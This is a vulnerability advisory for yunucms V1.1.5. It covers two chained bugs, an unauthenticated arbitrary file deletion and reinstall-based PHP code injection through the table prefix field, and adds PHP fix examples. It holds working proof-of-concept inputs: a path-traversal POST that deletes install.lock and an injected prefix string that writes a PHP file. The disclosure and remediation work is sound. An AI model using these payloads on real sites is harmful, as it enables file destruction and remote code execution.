Two issues were discovered in yunucms V1.1.5.
1. Arbitrary File Deletion
2. Launching a new installation process to execute PHP code
1. There is an arbitrary file deletion vulnerability which allows remote attackers to unlink any file.
The code section which makes this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
lines 34-68
In the remove() function shown above, the content of $_POST['key'] is passed to unlink() without any authentication check or path sanitization.
POC
URL: /statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock
/data/install.lock has been removed.
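The fix for this class of bug is to resolve the submitted key against a single allowed directory and refuse anything that lands outside it. The following is an added example, not yunucms code; the `$uploadRoot` parameter, the function name and the temporary directory layout are assumptions for the demo.

```php
<?php
// Added example (not yunucms code): restrict a user-supplied "key" to one
// allowed directory before calling unlink(). $uploadRoot is an assumed setting.
declare(strict_types=1);

function safeUnlink(string $key, string $uploadRoot): bool
{
    // Canonical absolute path of the only directory deletions may touch.
    $base = realpath($uploadRoot);
    if ($base === false || !is_dir($base)) {
        return false;
    }
    // Null bytes can truncate paths in the underlying C calls; refuse them outright.
    if (strpos($key, "\0") !== false) {
        return false;
    }
    // Treat the key as relative to $base even if it arrives with a leading slash.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . ltrim($key, '/\\'));
    // realpath() resolves "..", symlinks and duplicate separators, so the check
    // below sees the real target, not the textual path the client sent.
    if ($candidate === false || !is_file($candidate)) {
        return false;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        // Resolved outside the upload directory, e.g. "../data/install.lock".
        error_log('blocked unlink outside upload root: ' . $key);
        return false;
    }
    return unlink($candidate);
}

// Self-contained demo on a throwaway directory (constructed sample layout).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'unlink_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/uploads/image', 0700, true);
mkdir($root . '/data', 0700, true);
touch($root . '/uploads/image/ok.txt');
touch($root . '/data/install.lock');

var_dump(safeUnlink('image/ok.txt', $root . '/uploads'));        // a real upload inside the allowed directory
var_dump(safeUnlink('../data/install.lock', $root . '/uploads')); // traversal towards the install lock
var_dump(file_exists($root . '/data/install.lock'));             // whether the lock survived
```

The comparison is done on the value returned by `realpath()`, not on the raw string, because string filters for `..` are easy to bypass with alternate encodings, and a symlink placed inside the upload directory would also point outside it. An authentication check on the controller still belongs in front of this function; path containment only limits what an authorised caller can delete.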
2. Launching a new installation process to execute PHP code
After removing /data/install.lock, a remote attacker can launch a new installation process.
The code section which makes this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
lines 117-131
Following the function setConfigfile() in the /app/admin/common.php file:
lines 76-87
file_put_contents() is used to write $arr into $file (config\database.php).
POC

In installation step setup2, we can input
yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'
into the table prefix field (数据表前缀, DB_PREFIX). When the installation process finishes, /data/database.php looks like this:

Visiting the homepage http://127.0.0.1:81 will create the file /uploads/image/f4ck.php.
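The root cause here is that a form value is spliced into PHP source text and then written to a file that the application later includes. Two controls close it: validate the prefix against the character set a table prefix actually needs, and serialise the configuration with var_export() so that quotes in a value can never terminate the literal. The code below is an added example, not yunucms code; the function names and the lock-file convention are hypothetical and only mirror the behaviour described in the report.

```php
<?php
// Added example (not yunucms code): write an installer-generated database config
// without letting any submitted value become PHP source. Function names are hypothetical.
declare(strict_types=1);

function validateDbPrefix(string $prefix): bool
{
    // A table prefix needs nothing beyond letters, digits and underscores.
    return preg_match('/^[A-Za-z][A-Za-z0-9_]{0,31}$/', $prefix) === 1;
}

function buildConfigSource(array $config): string
{
    // var_export() produces a PHP literal with quotes and backslashes escaped,
    // so a value can never close the string and append code of its own.
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

function writeDatabaseConfig(string $file, array $config, string $lockFile): bool
{
    // Refuse to run the installer again once the lock exists.
    if (file_exists($lockFile)) {
        return false;
    }
    if (!isset($config['DB_PREFIX']) || !validateDbPrefix((string) $config['DB_PREFIX'])) {
        return false;
    }
    if (file_put_contents($file, buildConfigSource($config), LOCK_EX) === false) {
        return false;
    }
    // Create the lock only after the config was written successfully.
    return touch($lockFile);
}

// Constructed inputs: a normal prefix and one shaped like the report's payload.
$benign  = 'yunu_';
$hostile = "yunu_',].die('injected');\$a=['a'=>'";

var_dump(validateDbPrefix($benign));
var_dump(validateDbPrefix($hostile));

// Even if validation were skipped, var_export() keeps the hostile value inert:
echo buildConfigSource(['DB_PREFIX' => $hostile]);

$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cfg_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
var_dump(writeDatabaseConfig("$dir/database.php", ['DB_PREFIX' => $benign], "$dir/install.lock"));
var_dump(writeDatabaseConfig("$dir/database.php", ['DB_PREFIX' => $benign], "$dir/install.lock")); // second run, lock present
```

The lock check is deliberately the weaker of the two layers: as the report shows, a lock file can be deleted by another bug, so the config writer must be safe on its own. With var_export() the generated file stays a plain array literal regardless of what the installer received, and the allow-list regex additionally rejects the payload before anything is written.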
